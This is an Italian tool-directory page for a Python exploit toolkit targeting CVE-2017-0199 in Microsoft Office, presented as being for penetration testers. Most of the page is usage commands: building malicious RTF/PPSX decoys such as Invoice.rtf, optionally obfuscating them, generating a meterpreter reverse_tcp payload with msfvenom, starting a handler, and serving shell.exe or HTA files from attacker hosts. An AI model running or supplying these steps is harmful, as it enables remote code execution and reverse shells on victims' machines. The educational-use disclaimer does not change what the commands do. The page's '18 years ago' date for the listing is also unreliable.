Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-0199 | Kitploit
Strumenti/GitHubGitHub/phantomlancer123/cve-2017-0199
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubphantomlancer123/cve-2017-0199

CVE-2017-0199

Vedi Repository
18 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit toolkit CVE-2017-0199 - v4.0

Exploit toolkit CVE-2017-0199 - v4.0 è un pratico script Python che fornisce a penetration tester e ricercatori di sicurezza un modo rapido ed efficace per testare la RCE di Microsoft Office. Può generare un file RTF/PPSX dannoso e consegnare alla vittima payload metasploit / meterpreter / altri, senza alcuna configurazione complessa.

Disclaimer

Questo programma è solo a scopo EDUCATIVO. Non usarlo senza permesso. Vale il consueto disclaimer, in particolare il fatto che io (bhdresh) non sono responsabile per eventuali danni causati dall'uso diretto o indiretto delle informazioni o delle funzionalità fornite da questi programmi. L'autore o qualsiasi provider Internet NON ha alcuna responsabilità per contenuti o uso improprio di questi programmi o di loro derivati. Usando questo programma accetti il fatto che qualsiasi danno (perdita di dati, crash di sistema, compromissione del sistema, ecc.) causato dall'uso di questi programmi non è responsabilità di bhdresh.

Infine, questo è uno sviluppo personale, per favore rispettane la filosofia e non usarlo per scopi dannosi!

Licenza

Licenza CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

Note di rilascio:

Introdotte le seguenti funzionalità nello script

root@kitploit:~
- Generazione di file PPSX dannosi
- Modalità di sfruttamento per il file PPSX generato
- template.ppsx aggiornato

Versione: Python versione 2.7.13

Scenario 1: Consegnare payload locale

Comandi di esempio
root@kitploit:~
1) Genera file RTF dannoso
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Opzionale, se si usa payload MSF): Genera payload metasploit e avvia l'handler
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Avvia il toolkit in modalità exploit per consegnare payload locale
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
Diagramma di sequenza

alt tag

Scenario 2: Consegnare payload remoto

Comandi di esempio
root@kitploit:~
1) Genera file RTF dannoso
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Avvia il toolkit in modalità exploit per consegnare payload remoto
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe
Diagramma di sequenza

alt tag

Scenario 3: Consegnare file HTA personalizzato

Comandi di esempio
root@kitploit:~
1) Genera file RTF dannoso
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Avvia il toolkit in modalità exploit per consegnare file HTA personalizzato
   # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta
Diagramma di sequenza

alt tag

Argomenti della riga di comando:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

Questo è un pratico toolkit per sfruttare CVE-2017-0199 (RCE di Microsoft Office)

Modalità:

-M gen                                          Genera solo il file dannoso

     Genera file RTF/PPSX dannosi:

      -w <Filename.rtf/Filename.ppsx>     Nome del file RTF/PPSX dannoso (condividi questo file con la vittima).

      -u <http://attacker.com/test.hta>   Il percorso di un file HTA/SCT. Normalmente, dovrebbe essere un dominio o un IP dove questo
                                      tool è in esecuzione.
                                      Ad esempio, http://attackerip.com/test.doc (Questo URL sarà incluso nel file RTF/PPSX
                                      dannoso e verrà richiesto quando la vittima aprirà il file RTF dannoso.
      -t RTF|PPSX (default = RTF)         Tipo di file da generare.
      -x 0|1  (default = 0)               Genera un file RTF offuscato. 0 = Disabilita, 1 = Abilita.

				      
-M exp                                          Avvia la modalità di sfruttamento

     Sfruttamento:
 
      -t RTF|PPSX (default = RTF)         Tipo di file da sfruttare.
      -H </tmp/custom>                Percorso locale di un file HTA/SCT personalizzato che deve essere consegnato ed eseguito sul target.
                                          NOTA: Questa opzione non consegnerà i payload specificati tramite le opzioni "-e" e "-l"
					  
      -p <TCP port:Default 80>            Numero di porta locale.

      -e <http://attacker.com/shell.exe>  Il percorso di un file eseguibile / shell meterpreter / payload che deve essere eseguito sul target.

      -l </tmp/shell.exe>                 Se il payload è ospitato localmente, specifica il percorso locale di un file eseguibile / shell meterpreter / payload.

Crediti

@nixawk per il campione RTF, @Li Haifei, @bhdresh

Bug, problemi, richieste di funzionalità

Ovviamente, non sono uno sviluppatore a tempo pieno, quindi aspettatevi qualche intoppo

Segnalate bug e problemi tramite https://github.com/bhdresh/CVE-2017-0199/issues/new

Scarica lo strumento